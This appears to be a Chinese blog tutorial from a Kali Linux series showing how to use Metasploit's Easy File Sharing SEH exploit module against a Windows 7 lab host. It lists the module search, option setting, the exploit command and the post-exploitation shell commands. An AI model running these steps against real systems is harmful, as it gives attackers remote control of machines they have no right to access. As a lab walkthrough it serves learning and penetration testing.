本文主要是介绍kali -linux第七部分之第四篇Metasploit对应用程序,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
文章目录
- 介绍
- 环境搭建
- 漏洞复现
- 第一步 查找相关的漏洞模块
- 第二步 查看设置参数
- 第三步 设置参数,利用
- 第四步 查看利用结果
- 摘抄
介绍
- 单文件共享http服务器软件。
- 但是这款软件在2015年被发现了,求了关于这漏洞的渗透模块,现在我们就利用漏洞来对一个操作系统为 Winde的标进行渗透
环境搭建
主机 | 地址 |
---|
kali | 192.168.232.198 |
win7 | 192.168.232.208 |
漏洞复现
第一步 查找相关的漏洞模块
search EasyfileSharing
第二步 查看设置参数
use exploit/windows/http/easyfilesharing_seh
show options
第三步 设置参数,利用
set rhosts 192.168.232.208
exploit
第四步 查看利用结果
shell
id
chcp 65001
whoami
摘抄
我猜人生到头来,就是不断地放下
但永远最令人痛心的
就是没来得及好好道别
–《少年派的奇幻漂流》
这篇关于kali -linux第七部分之第四篇Metasploit对应用程序的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!